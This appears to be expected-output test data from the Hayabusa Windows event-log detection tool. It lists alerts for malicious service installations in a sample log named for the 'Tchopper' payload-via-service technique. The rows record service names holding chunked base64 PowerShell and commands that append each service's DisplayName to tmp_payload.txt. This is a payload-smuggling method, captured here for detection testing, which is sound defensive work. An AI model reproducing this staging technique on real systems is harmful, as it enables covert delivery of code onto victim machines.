+2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:23.325 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmFtKCRDb21wdXRlcmxpc3QsICRDb21wdXRlckNvdW50LCAkQ29tcHV0ZXJMaXN0VHlwZSwgJE9TKSAgICANCg0KICAgIHRyeSB7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQHt9DQogIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:24.762 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRQcm9ncmVzc0NvdW50ID0gMDsgICAgICAgIA0KDQogICAgICAgIGlmICgkQ29tcHV0ZXJMaXN0VHlwZSAtTkUgJExPQ0FMSE9TVF9PUFQpIHsNCg0KICAgICAgICAgICAgJEdsb2JhbDpD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:26.229 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmVkID0gR2V0LUNyZWRlbnRpYWwgLU1lc3NhZ2UgIkVudGVyIGFuIGFjY291bnQgd2hpY2ggaGFzIGFjY2VzcyB0byB0aGUgV2luZG93cyBFdmVudCBMb2dzIg0KICAgICAgICB9DQoNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:27.683 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICBGb3JFYWNoICgkQ29tcHV0ZXIgaW4gJENvbXB1dGVybGlzdCkgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAkUHJvZ3Jlc3ND | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:29.154 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3VudCA9ICRQcm9ncmVzc0NvdW50ICsgMQ0KDQogICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkZmFsc2UNCg0KICAgICAgICAgICAgaWYoJFByb2dyZXNzQ291bnQgLUVRIDEpIHsNCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:30.607 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJElORk9fTE9HICJDYWxjdWxhdGluZyAmIFByb2Nlc3NpbmcgTG9nIEVQUyBGb3IgQ29tcHV0ZXIgTGlzdCIgDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
